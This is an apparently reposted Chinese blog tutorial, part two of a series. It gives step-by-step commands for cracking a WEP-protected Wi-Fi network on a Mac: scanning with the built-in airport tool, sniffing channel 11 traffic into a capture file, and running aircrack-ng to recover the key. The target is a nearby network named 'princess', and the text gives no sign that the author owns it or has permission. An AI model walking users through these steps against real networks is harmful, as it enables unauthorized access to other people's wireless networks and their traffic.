Mac系統安裝Aircrack-ng破解wifi密碼(2)


  我們上一篇文章說過如何通過Aircrack-ng, 破解使用WPA/PSK加密方式的路由密碼, 這一篇介紹的是使用Aircrack-ng破解使用WEP加密方式的路由密碼;

  WEP和WPA/PSK的區別

  WPA/PSK的加密方式相對於WEP的加密方式更加安全,WEP是一種老式的加密方式,在2003年時就被WPA加密所淘汰,由於其安全性能存在好幾個弱點,很容易被專業人士攻破,不過,對於非專業人來說還是比較安全的。其次由於WEP采用的是IEEE 802.11技術,而現在無線路由設備基本都是使用的IEEE 802.11n技術,因此,當使用WEP加密時會影響無線網絡設備的傳輸速率,如果是以前的老式設備只支持IEEE 802.11的話,那么無論使用哪種加密都可以兼容,對無線傳輸速率沒有什么影響。

  WPA-PSK/WPA2-PSK是我們現在經常設置的加密類型,這種加密類型安全性能高,而且設置也相當簡單,不過需要注意的是它有AES和TKIP兩種加密算法。

  准備安裝macport和aircrack-ng

  安裝macport和aircrack-ng的方式在第一篇文章中已經做過介紹了, 這邊不重新介紹, 參考這里:http://www.cnblogs.com/diligenceday/p/6263037.html#_label0

  查看附近所有的路由

  通過OSX自帶的airport查找附近的所有wifi

sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s

 

  可以看到最后一個路由princess使用的加密方式是WEP, 而且頻段是11, WEP方式的路由密碼比較好破解, 我們就以它下手:

  

  現在開始抓包, 我們要監聽的網卡為en0, 需要抓包的頻道為11, 構造出命令行語句, 在Mac的命令行中執行:

sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 sniff 11

 

  過了半小時, 我就直接按ctrl+c, 終止抓包的過程, 結果如圖, 抓到的數據包被保存到airportSniffzLHDzF.cap中了:

  分析數據包

  執行命令分析數據包:

sudo aircrack-ng /tmp/airportSniffzLHDzF.cap

  aircrack-ng的執行結果如下:

  破解WEP密碼

  數據包分析完畢以后, 命令行最小面會出現一句話:

Index number of target network ? 

  我們輸入2, 因為上圖中princessIndex number2, 這個每一次結果都不同;

  界面一陣狂閃過后 , 如果出現了KEY FOUND, 說明密碼破解出來了, 如果沒有出現KEY FOUND ,那么說明你捕獲的數據還不夠, 務必重新捕獲, 密碼為10個大寫的A:

   因為WEP算法的缺陷, 只要抓到的包足夠多, 就可以破解出密碼;

  good luck

  參考:

    Mac系統安裝Aircrack-ng破解wifi密碼(WPA\PSK) : http://www.cnblogs.com/diligenceday/p/6263037.html   

    wep算法相關:http://blog.csdn.net/dinosoft/article/details/9153399

 

作者: NONO
出處:http://www.cnblogs.com/diligenceday/
QQ:287101329
微信:18101055830 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM